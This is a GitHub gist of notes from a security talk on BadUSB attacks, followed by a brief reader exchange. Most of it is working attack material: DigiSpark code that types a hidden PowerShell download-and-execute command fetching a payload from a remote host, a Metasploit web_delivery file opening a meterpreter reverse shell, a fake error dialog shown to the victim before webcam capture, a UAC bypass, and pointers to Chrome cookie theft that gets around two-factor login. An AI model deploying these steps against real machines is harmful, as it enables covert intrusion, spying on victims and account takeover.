Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Notes of Null talk on BadUSB
## Bad USB code
#include "DigiKeyboard.h"
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished
void setup() {
}
void loop() {
digitalWrite(WorkingPin, HIGH);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
digitalWrite(WorkingPin, LOW);
for (;;) {
/*Stops the digispark from running the scipt again*/
}
}
## Metasploit resource file used in demonstration msf-web-delivery.rc
use exploit/multi/script/web_delivery
set Target 2
set LHOST <YOUR_LOCAL_IP_HERE>
set LPORT 6680
set payload windows/x64/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/migrate # This step is necessary otherwise the session just dies
exploit -j
## For Popping up an innocuous message box, before starting capturing webcam snaps
DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527
railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox
If the above doesn't work you might need to put 'client' in the start of the command ( as shown in the video ), like this :
client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10)
## For VNC
After getting a meterpreter session : run vnc
Then connect with a VNC client on the "local machine"
## For privilege escalation ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ )
use exploit/windows/local/bypassuac_comhijack
set payload windows/x64/meterpreter/reverse_tcp
set session 2
set LHOST <YOUR_LOCAL_IP_HERE>
exploit
## For extracting google chrome cookies, as extracting passwords would still need you to enter the OTP, if 2FA is enabled :
https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
You can follow the discussion here ( quite interesting if you would ask ) : https://news.ycombinator.com/item?id=18376323
There's a metasploit module available too : https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md
## State of the art things
Bad USB cables : https://mg.lol/blog/badusb-cables/
O.M.G. cables : https://mg.lol/blog/omg-cable/
## Other Useful Things
DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts
#shamelessSelfPromotion Ahead :p
You can read my other blogs here : https://lud1161.github.io/
and
Here : https://lud1161.wordpress.com/
@vishwaskheriwal

This comment has been minimized.

Copy link

commented Jun 2, 2019

Sir can you provide a video on this topic.

@LuD1161

This comment has been minimized.

Copy link
Owner Author

commented Jun 2, 2019

Hello @vishwaskheriwal, sorry to break out to you but the talk wasn't recorded and I am not getting time enough to make a tutorial for the same and put it up online.
Feel free to join for the talk , if and when it happens next.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.